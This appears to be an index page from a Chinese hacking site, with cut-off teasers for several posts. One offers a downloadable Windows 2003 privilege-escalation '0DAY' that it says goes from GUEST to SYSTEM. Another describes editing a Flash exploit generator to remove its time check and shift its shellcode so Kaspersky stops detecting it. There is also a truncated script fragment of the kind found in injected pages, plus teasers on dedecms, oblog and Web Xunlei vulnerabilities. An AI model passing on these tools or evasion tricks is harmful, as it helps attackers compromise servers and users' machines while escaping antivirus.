2003服务器提权0DAY  据说如此。 而且针对2003服务器，只要对方的WS启用，
都可从GUEST权限提升至SYSTEM权限。已测试。

thunder://QUFodHRwOi8vZG93bi41MjBoYWNrLmNvbS9zb2Z0LzIwMDgxMC8xMDExL3dpbmRvd3MyMDAzdHEucmFyWlo=
Windows 2003服务器提权0DAY.zip (32.23 KB , 下载:15次)

[阅读全文]

作者：open
首先说下。偶么有看其它的版本。我只对我中招后所提出来的版本为例。
其它版本我一无所知。
看留言有位仁兄提出时间问题。是的。这个版本却实有个时间验证问题。
不过改一个字节足可以跳过它的验证。
还有偶对SWF格式或FLASH完全不熟。
我从来不当它是一个SWF来反编译来。
下面是我改过的生成器。去掉时间验证，同时把SHELLCODE向后推了两个字节。卡巴应该不会再叫。

其实杀软不清楚，

[阅读全文]

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
exp

[阅读全文]

[阅读全文]

注:穿山甲的利用工具傻瓜式的很方便.
在xinca那看到了关于dedecms 5.1的漏洞公告，漏洞页面是    \include\inc_bookfunctions.php
触发页面是  member/story_add_content_action.php

[阅读全文]

[阅读全文]

[阅读全文]

此文章已发表在《黑客X档案》第11期杂志上
如需转载，请务必保留此信息！

作者：zj1244&竹子

   自从上次oblog的tb.asp和js.asp文件出现漏洞后，直至今日oblog都没有爆出什么安全问题，前些日子官方发布了4.6稳定版，趁着无聊下下来看看代码的安全性，没想到还真的发现了一些问题。后来联系了oblog的客服，可是在qq上验证了几次人家也没有理

[阅读全文]

一、事件分析：
  　　DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光，该漏洞发生在Web迅雷的一个控件上，当安装了Web迅雷的用户在浏览黑客精心构造的包含恶意代码的网页后，会下载任意程序在用户系统上以当前用户上下文权限运行。
  　　Web迅雷1.7.3.109版之前的版本均受影响。

　　根据BCT组织分析，该漏洞产生细节如下：
　　WEB

[阅读全文]